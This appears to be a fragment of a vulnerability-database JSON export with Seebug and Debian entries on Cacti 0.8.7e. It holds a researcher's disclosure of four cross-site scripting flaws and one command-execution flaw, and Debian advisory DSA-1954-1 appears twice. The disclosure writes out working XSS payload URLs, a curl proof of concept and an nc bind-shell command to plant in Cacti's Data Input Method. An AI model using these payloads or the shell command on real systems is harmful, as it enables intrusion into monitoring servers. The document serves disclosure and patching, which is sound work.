"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T18:28:20", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-18336", "id": "SSV:18336", "type": "seebug", "title": "Cacti 0.8.7e: Multiple Security Issues", "sourceData": "\n Moritz Naumann <security@moritz-naumann.com>\r\n\r\ncacti:\r\nhttp://www.cacti.net/\r\n\r\n=================================================================\r\nCacti 0.8.7e and earlier versions are affected by multiple security\r\nissues. Issues 1-4 are cross site scripting issues, issue 5 is a\r\npriviledge escalation issue.\r\n\r\n\r\n\r\n\r\n1. XSS 1\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '1' to be displayed:\r\n\r\nhttp://CACTIHOST/graph.php?action=zoom&local_graph_id=1&graph_end=1%27%20style=visibility:hidden%3E%3Cscript%3Ealert(1)%3C/script%3E%3Cx%20y=%27\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThis vulnerability was tested with Firefox 3.0.6.\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n2. XSS 2\r\n\r\nThe following curl invocation will generate a HTTP POST request\r\nagainst\r\n\r\nhttp://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true\r\n\r\nwith an 'application/x-www-form-urlencoded' content type HTTP body part\r\ncontaining\r\n date1=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Cx+y%3D%27'\r\nCurl will write the resulting output to a file named poc.html.\r\n\r\n> curl -d 'date1=%27%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E%3Cx+y%3D%27' 'http://CACTIHOST/graph_view.php?action=tree&tree_id=1&leaf_id=7&select_first=true' > poc.html\r\n\r\nWhen this file is loaded and rendered by a web browser with Javascript\r\nsupport, this will cause a dialog box saying '2' to be displayed.\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n3. XSS 3\r\n\r\nIf an attacker or the victim has permission to modify the graph\r\ndisplay settings via graph_settings.php, the attacker is able to\r\npersistently inject javascript code via the 'page_refresh' and\r\n'default_dual_pane_width' parameters.\r\n\r\nSetting 'page_refresh' to the following value will, on any consecutive\r\nvisitors' web browser with Javascript support, cause a dialog box saying\r\n'3' to be displayed:\r\n 300'><x y='\r\n\r\nSetting 'default_dual_pane_width' to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '3' to be displayed:\r\n 200"><x y="\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n4. XSS 4\r\n\r\nA HTTP GET request against the following URL will, on a web browser\r\nwith Javascript support, cause a dialog box saying '4' to be displayed:\r\n\r\n> >\r\nhttp://CACTIHOST/graph.php?action=properties&local_graph_id=201&rra_id=0&view_type=tree&graph_start=%3C/pre%3E%3Cscript%3Ealert(4)%3C/script%3E%3Cpre%3E\r\n\r\nThis vulnerability is only exploitable if the victim is allowed to view\r\ngraphs. This will be true if the victim has previously authenticated\r\nagainst Cacti or if both the guest user has been activated (default:\r\ndisabled) and the graph view permission was set to 'guest' (default:\r\n'No User').\r\n\r\nAlternatively, a similar injection can be achieved, if an attacker or\r\nhis victim has permission to modify the graph display settings via\r\ngraph_settings.php. If so, the attacker is able to persistently inject\r\njavascript code via the 'title_size', 'legend_size', 'axis_size' and\r\n'unit_size' parameters.\r\n\r\nSetting any of these parameters to the following value will, on any\r\nconsecutive visitors' web browser with Javascript support, cause a\r\ndialog box saying '4' to be displayed:\r\n 8</pre><pre>\r\n\r\nThis vulnerability was tested with Firefox 3.0.6\r\n\r\nThe Cacti group provides a patch to fix this vulnerability:\r\nhttp://www.cacti.net/downloads/patches/0.8.7e/cross_site_fix.patch\r\n\r\n\r\n\r\n5. Priviledge escalation\r\n\r\nFinally, due to the permissive way the web interface allows Cacti\r\nto be configured, a cacti administrator is also able to execute\r\narbitrary commands on the system as the user the Cacti polling mechanism\r\n runs as (usually a non-priviledged user).\r\n\r\nFor example, it is possible to successfully spawn (and connect to) a\r\nbackdoor/remote shell on the Cacti system by changing the "Data Input\r\nMethod" for "Linux - Get Memory Usage". Setting "Input String" to\r\n nohup nc -l -p 6666 -n -e /bin/sh &\r\nwould spawn a remotely accessible shell whenever this handler was called\r\n(every couple of minutes by default on my Debian test system).\r\n\r\nCacti developers say:\r\n> There is no effective way to fix the data input method without breaking Cacti. It will be reviewed for the release of 0.8.8.\r\n\r\n\r\n\r\nThe XSS issues are currently tracked as CVE-2009-4032 (additional CVEs\r\nmay or may not be assigned), issue 5 has not been tracked so far (to my\r\nknowledge).\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18336", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T18:24:06", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2009-12-17T00:00:00", "published": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15105", "id": "SSV:15105", "type": "seebug", "title": "New cacti packages fix insufficient input sanitising", "sourceData": "\n - ------------------------------------------------------------------------\r\nDebian Security Advisory DSA-1954-1 security@debian.org\r\nhttp://www.debian.org/security/ Steffen Joeris\r\nDecember 16, 2009 http://www.debian.org/security/faq\r\n- ------------------------------------------------------------------------\r\n\r\nPackage : cacti \r\nVulnerability : insufficient input sanitising \r\nProblem type : remote \r\nDebian-specific: no \r\nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \r\nDebian Bugs : 429224 \r\n\r\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\r\nfor monitoring systems and services. The Common Vulnerabilities and\r\nExposures project identifies the following problems:\r\n\r\nCVE-2007-3112, CVE-2007-3113\r\n\r\nIt was discovered that cacti is prone to a denial of service via the\r\ngraph_height, graph_width, graph_start and graph_end parameters.\r\nThis issue only affects the oldstable (etch) version of cacti.\r\n\r\nCVE-2009-4032\r\n\r\nIt was discovered that cacti is prone to several cross-site scripting\r\nattacks via different vectors.\r\n\r\nCVE-2009-4112\r\n\r\nIt has been discovered that cacti allows authenticated administrator\r\nusers to gain access to the host system by executing arbitrary commands\r\nvia the "Data Input Method" for the "Linux - Get Memory Usage" setting.\r\n\r\nThere is no fix for this issue at this stage. Upstream will implement a\r\nwhitelist policy to only allow certain "safe" commands. For the moment,\r\nwe recommend that such access is only given to trusted users and that\r\nthe options "Data Input" and "User Administration" are otherwise\r\ndeactivated.\r\n\r\n\r\nFor the oldstable distribution (etch), these problems have been fixed in\r\nversion 0.8.6i-3.6.\r\n\r\nFor the stable distribution (lenny), this problem has been fixed in\r\nversion 0.8.7b-2.1+lenny1.\r\n\r\nFor the testing distribution (squeeze), this problem will be fixed soon.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 0.8.7e-1.1.\r\n\r\n\r\nWe recommend that you upgrade your cacti packages.\r\n\r\nUpgrade instructions\r\n- --------------------\r\n\r\nwget url\r\n will fetch the file for you\r\ndpkg -i file.deb\r\n will install the referenced file.\r\n\r\nIf you are using the apt-get package manager, use the line for\r\nsources.list as given below:\r\n\r\napt-get update\r\n will update the internal database\r\napt-get upgrade\r\n will install corrected packages\r\n\r\nYou may use an automated update by adding the resources from the\r\nfooter to the proper configuration.\r\n\r\n\r\nDebian GNU/Linux 4.0 alias etch\r\n- -------------------------------\r\n\r\nDebian (oldstable)\r\n- ------------------\r\n\r\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, \\\r\nmipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\r\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\r\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\r\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\r\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\r\n\r\n\r\nDebian GNU/Linux 5.0 alias lenny\r\n- --------------------------------\r\n\r\nDebian (stable)\r\n- ---------------\r\n\r\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, \\\r\nmipsel, powerpc, s390 and sparc.\r\n\r\nSource archives:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\r\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz \\\r\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\r\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\r\n\r\nArchitecture independent packages:\r\n\r\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb \\\r\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\r\n\r\n\r\n These files will probably be moved into the stable distribution on\r\n its next update.\r\n\r\n- ---------------------------------------------------------------------------------\r\nFor apt-get: deb http://security.debian.org/ stable/updates main\r\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\r\nMailing list: debian-security-announce@lists.debian.org\r\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is\r\nEG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM\r\n=CLbl\r\n-----END PGP SIGNATURE-----\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-15105", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-10-16T22:12:50", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1954-1 security@debian.org\nhttp://www.debian.org/security/ Steffen Joeris\nDecember 16, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : cacti \nVulnerability : insufficient input sanitising \nProblem type : remote \nDebian-specific: no \nCVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032 \nDebian Bugs : 429224 \n\nSeveral vulnerabilities have been found in cacti, a frontend to rrdtool\nfor monitoring systems and services. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2007-3112, CVE-2007-3113\n\nIt was discovered that cacti is prone to a denial of service via the\ngraph_height, graph_width, graph_start and graph_end parameters.\nThis issue only affects the oldstable (etch) version of cacti.\n\nCVE-2009-4032\n\nIt was discovered that cacti is prone to several cross-site scripting\nattacks via different vectors.\n\nCVE-2009-4112\n\nIt has been discovered that cacti allows authenticated administrator\nusers to gain access to the host system by executing arbitrary commands\nvia the "Data Input Method" for the "Linux - Get Memory Usage" setting.\n\nThere is no fix for this issue at this stage. Upstream will implement a\nwhitelist policy to only allow certain "safe" commands. For the moment,\nwe recommend that such access is only given to trusted users and that\nthe options "Data Input" and "User Administration" are otherwise\ndeactivated.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 0.8.6i-3.6.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.8.7b-2.1+lenny1.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.8.7e-1.1.\n\n\nWe recommend that you upgrade your cacti packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz\n Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz\n Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc\n Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb\n Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e\n\n\nDebian GNU/Linux 5.0 alias lenny\n- --------------------------------\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz\n Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz\n Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc\n Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb\n Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-12-16T11:47:55", "published": "2009-12-16T11:47:55", "id": "DEBIAN:DSA-1954-1:7A11F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00278.html", "title": "[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising", "type": "debian", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
